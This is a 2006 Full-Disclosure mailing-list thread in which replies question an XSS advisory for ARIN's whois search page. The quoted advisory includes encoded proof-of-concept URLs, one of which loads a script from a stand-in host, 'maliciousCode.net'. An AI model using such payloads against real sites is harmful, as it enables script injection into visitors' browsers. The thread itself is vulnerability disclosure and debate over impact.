Right,
Did this ever work? This fails for me man. How did you verify it?
Steven wrote:
> ok?
>
> So what exactly are you going to exploit here? This site doesn't have any
> logins or even use cookies. Are you going to trick a user into entering in a
> credit card number before they can search the whois database?
>
> I think that XSS in many instances is a serious issues. Many of the XSS
> issues reported on FD are rarely of much consequence but could theoretically
> lead to a sessions hijack or tricking the user into a fake login screen.
> However, in this instance I fail to see what the point could possible be? If
> it is that you can simply run javascript then so what? Close to 100% of any
> webhosting provider on the internet will let you upload your own javascript.
> Might as well report that geocities.com is vulnerable to XSS because you
> could upload an html file with javascript on it.
>
> Anyway.. that's my take on this. Feel free to correct me.. I don't mind.
>
> Steven
>
> ----- Original Message -----
> From: Terminal Entry
> To: Full Disclosure ; Bug Traq
> Sent: Thursday, March 02, 2006 11:17 PM
> Subject: [Full-disclosure] Arin.net XSS
>
>
> Title
> ARIN.NET input validation holes in "?queryinput=" allows remote users
> conduct cross-site scripting attacks
>
> Notification
> Multiple attempts to contact Arin site administrators went unanswered
>
> Exploit Included: Yes
>
> Description
> The "?queryinput=" script does not properly validate user-supplied input in
> several parameters to filter HTML code. A remote user can create a specially
> crafted URL that, when loaded by a target user, will cause arbitrary
> scripting code to be executed by the target user's browser.
>
> Some demonstration exploit URLs are provided:
>
> http://ws.arin.net/whois/?queryinput=%3CIMG+SRC%3D%22javascript%3Aalert%28%27XSS%27%29%3B%22%3E
>
> http://ws.arin.net/whois/?queryinput=%3CSCRIPT+SRC%3Dhttp%3A%2F%2FmaliciousCode.net%2Fexploit.js%3E%3C%2FSCRIPT%3E
>
> http://ws.arin.net/whois/?queryinput=%3CIMG+SRC%3D%22javascript%3Aalert%28%27XSS%27%29%3B%22%3E
>
> Discovered by Terminal Entry security [.at.] peadro (.)net
>
>
>
>
> ------------------------------------------------------------------------------
> This email and any files transmitted with it are confidential and intended
> solely for the use of the individual or entity to whom they are addressed. If
> you have received this email in error please notify the system manager. This
> message contains confidential information and is intended only for the
> individual named. If you are not the named addressee you should not
> disseminate, distribute or copy this e-mail. Please notify the sender
> immediately by e-mail if you have received this e-mail by mistake and delete
> this e-mail from your system. If you are not the intended recipient you are
> notified that disclosing, copying, distributing or taking any action in
> reliance on the contents of this information is strictly prohibited.
>
>
>
> ------------------------------------------------------------------------------
>
>
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
>
> ------------------------------------------------------------------------
>
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
--
Regards,
Adriel T. Desautels
Harvard Security Group
http://www.harvardsecuritygroup.com
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
